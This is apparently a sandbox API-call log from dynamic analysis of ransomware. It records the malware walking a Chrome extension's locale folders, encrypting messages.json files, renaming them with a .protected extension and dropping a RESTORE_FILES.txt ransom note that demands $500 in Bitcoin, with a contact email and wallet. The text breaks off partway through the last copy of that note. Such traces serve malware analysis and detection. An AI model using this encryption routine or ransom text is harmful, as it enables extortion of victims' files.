wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN") returned 144 [0079.123] lstrcmpW (lpString1="zh_CN", lpString2=".") returned 1 [0079.123] lstrcmpW (lpString1="zh_CN", lpString2="..") returned 1 [0079.123] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\*") returned 146 [0079.123] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.123] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.123] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.123] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.123] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.123] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.123] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\.") returned 146 [0079.123] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.123] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.123] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.123] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.123] lstrcmpiW (lpString1="..", lpString2="Program Files 
(x86)") returned -1 [0079.123] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.123] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.123] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\..") returned 147 [0079.123] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.123] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.123] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.123] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.123] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.124] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.124] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.124] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.124] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\messages.json") returned 158 [0079.124] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.124] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.124] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.124] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.124] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_cn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.124] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\messages.json") returned 158 [0079.124] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.124] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\messages.json") returned 158 [0079.124] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.124] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\messages.json") returned 158 [0079.124] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.124] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xce, lpOverlapped=0x0) returned 1 [0079.125] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff32, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.125] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xce, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xce, lpOverlapped=0x0) 
returned 1 [0079.125] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.126] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.126] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.126] CloseHandle (hObject=0x168) returned 1 [0079.126] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\messages.json.protected") returned 168 [0079.126] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_cn\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_cn\\messages.json.protected")) returned 1 [0079.127] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.127] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.127] 
wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\RESTORE_FILES.txt") returned 162 [0079.127] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_cn\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.127] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.127] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.128] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.128] WriteFile (in: hFile=0x164, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.128] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.128] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.128] CloseHandle (hObject=0x164) returned 1 [0079.128] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.128] lstrcmpiW (lpString1="zh_TW", lpString2="Windows") returned 1 [0079.128] lstrcmpiW (lpString1="zh_TW", lpString2="Program Files") returned 1 [0079.129] lstrcmpiW (lpString1="zh_TW", lpString2="Program Files (x86)") returned 1 [0079.129] lstrcmpiW (lpString1="zh_TW", lpString2="$Recycle.bin") returned 1 [0079.129] lstrcmpiW (lpString1="zh_TW", lpString2="System Volume Information") returned 1 [0079.129] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW") returned 144 [0079.129] lstrcmpW (lpString1="zh_TW", lpString2=".") returned 1 [0079.129] lstrcmpW (lpString1="zh_TW", lpString2="..") returned 1 [0079.129] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\*") returned 146 [0079.129] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.129] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.129] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.129] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.129] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.129] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.129] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\.") returned 146 [0079.129] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.129] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.129] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.129] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.129] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.129] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.129] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.129] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\..") returned 147 [0079.129] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.129] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.129] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.129] lstrcmpiW 
(lpString1="messages.json", lpString2="Windows") returned -1 [0079.130] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.130] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.130] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.130] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.130] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\messages.json") returned 158 [0079.130] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.130] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.130] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.130] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.130] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.130] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\messages.json") returned 158 [0079.130] StrStrW 
(lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.130] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\messages.json") returned 158 [0079.130] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.130] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\messages.json") returned 158 [0079.130] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.130] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xce, lpOverlapped=0x0) returned 1 [0079.131] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff32, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.131] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xce, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xce, lpOverlapped=0x0) returned 1 [0079.131] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.132] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.132] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.132] CloseHandle (hObject=0x168) returned 1 [0079.132] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, 
pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\messages.json.protected") returned 168 [0079.132] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_tw\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_tw\\messages.json.protected")) returned 1 [0079.133] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.133] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.133] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\RESTORE_FILES.txt") returned 162 [0079.133] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_tw\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, 
lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.133] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.133] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.134] lstrlenA (lpString="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") returned 684 [0079.134] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, 
lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.134] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.134] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.134] CloseHandle (hObject=0x164) returned 1 [0079.134] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0 [0079.134] FindClose (in: hFindFile=0x47bbd0 | out: hFindFile=0x47bbd0) returned 1 [0079.134] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\RESTORE_FILES.txt") returned 156 [0079.135] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0079.135] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour 